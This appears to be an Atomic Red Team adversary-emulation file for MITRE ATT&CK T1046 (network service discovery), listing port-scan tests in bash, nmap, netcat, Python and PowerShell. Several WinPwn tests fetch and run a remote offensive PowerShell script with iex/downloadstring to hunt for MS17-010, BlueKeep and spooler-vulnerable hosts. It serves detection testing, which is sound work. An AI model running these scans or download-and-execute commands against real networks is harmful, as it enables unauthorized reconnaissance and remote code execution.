attack_technique: T1046 display_name: Network Service Discovery atomic_tests: - name: Port Scan auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 description: | Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. supported_platforms: - linux - macos input_arguments: host: description: Host to scan. type: string default: 192.168.1.1 executor: command: | for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done name: bash - name: Port Scan Nmap auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f description: | Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. supported_platforms: - linux - macos input_arguments: host: description: Host to scan. type: string default: 192.168.1.1 port: description: Ports to scan. type: string default: "80" network_range: description: Network Range to Scan. type: string default: 192.168.1.0/24 dependency_executor_name: sh dependencies: - description: | Check if nmap command exists on the machine prereq_command: | if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; get_prereq_command: | (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap) - description: | Check if nc command exists on the machine prereq_command: | if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi; get_prereq_command: | (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat) - description: | Check if telnet command exists on the machine prereq_command: | if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi; get_prereq_command: | (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet) executor: command: | sudo nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port} name: sh elevation_required: true - name: Port Scan NMap for Windows auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df description: Scan ports to check for listening ports for the local host 127.0.0.1 supported_platforms: - windows input_arguments: nmap_url: description: NMap installer download URL type: url default: https://nmap.org/dist/nmap-7.80-setup.exe host_to_scan: description: The host to scan with NMap type: string default: 127.0.0.1 dependency_executor_name: powershell dependencies: - description: | NMap must be installed prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" #{nmap_url} Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S executor: command: |- nmap #{host_to_scan} name: powershell elevation_required: true - name: Port Scan using python auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: | Scan ports to check for listening ports with python supported_platforms: - windows input_arguments: host_ip: description: Host to scan. type: string default: 127.0.0.1 filename: description: Location of the project file type: path default: PathToAtomicsFolder\T1046\src\T1046.py dependency_executor_name: powershell dependencies: - description: | Check if python exists on the machine prereq_command: | if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait executor: command: | python "#{filename}" -i #{host_ip} name: powershell - name: WinPwn - spoolvulnscan auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') spoolvulnscan -noninteractive -consoleoutput name: powershell - name: WinPwn - MS17-10 auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6 description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') MS17-10 -noninteractive -consoleoutput name: powershell - name: WinPwn - bluekeep auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73 description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain). supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') bluekeep -noninteractive -consoleoutput name: powershell - name: WinPwn - fruit auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98 description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') fruit -noninteractive -consoleoutput name: powershell - name: Network Service Discovery for Containers auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information. supported_platforms: - containers dependency_executor_name: sh dependencies: - description: Verify docker is installed. prereq_command: | which docker get_prereq_command: | if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - description: Verify docker service is running. prereq_command: | sudo systemctl status docker --no-pager get_prereq_command: | sudo systemctl start docker executor: command: |- docker build -t t1046 $PathToAtomicsFolder/T1046/src/ docker run --name t1046_container --rm -d -t t1046 docker exec t1046_container /scan.sh cleanup_command: |- docker stop t1046_container docker rmi -f t1046 name: sh - name: Port-Scanning /24 Subnet with PowerShell auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4 description: | Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed. supported_platforms: - windows input_arguments: ip_address: description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots) type: string default: "" port_list: description: Comma separated list of ports to scan type: string default: "445, 3389" timeout_ms: description: Connection timeout in milliseconds type: string default: "200" executor: command: |- $ipAddr = "#{ip_address}" if ($ipAddr -like "*,*") { $ip_list = $ipAddr -split "," $ip_list = $ip_list.ForEach({ $_.Trim() }) Write-Host "[i] IP Address List: $ip_list" $ports = #{port_list} foreach ($ip in $ip_list) { foreach ($port in $ports) { Write-Host "[i] Establishing connection to: $ip : $port" try { $tcp = New-Object Net.Sockets.TcpClient $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null } catch {} if ($tcp.Connected) { $tcp.Close() Write-Host "Port $port is open on $ip" } } } } elseif ($ipAddr -notlike "*,*") { if ($ipAddr -eq "") { # Assumes the "primary" interface is shown at the top $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1 Write-Host "[i] Using Interface $interface" $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress } Write-Host "[i] Base IP-Address for Subnet: $ipAddr" $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1) # Always assumes /24 subnet Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'" $ports = #{port_list} $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" } foreach ($ip in $subnetIPs) { foreach ($port in $ports) { try { $tcp = New-Object Net.Sockets.TcpClient $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null } catch {} if ($tcp.Connected) { $tcp.Close() Write-Host "Port $port is open on $ip" } } } } else { Write-Host "[Error] Invalid Inputs" exit 1 } name: powershell - name: Remote Desktop Services Discovery via PowerShell auto_generated_guid: 9e55750e-4cbf-4013-9627-e9a045b541bf description: | Availability of remote desktop services can be checked using get- cmdlet of PowerShell supported_platforms: - windows executor: command: | Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration" name: powershell elevation_required: true - name: Port Scan using nmap (Port range) auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97 description: | Scan multiple ports to check for listening ports with nmap supported_platforms: - linux - macos input_arguments: host: description: Host(s) to scan. type: string default: "127.0.0.1" port_range: description: Port range(s) to scan. type: string default: "0-65535" dependency_executor_name: sh dependencies: - description: | Check if nmap command exists on the machine prereq_command: | if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; get_prereq_command: | (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap) executor: command: | nmap -Pn -sV -p #{port_range} #{host} elevation_required: true name: sh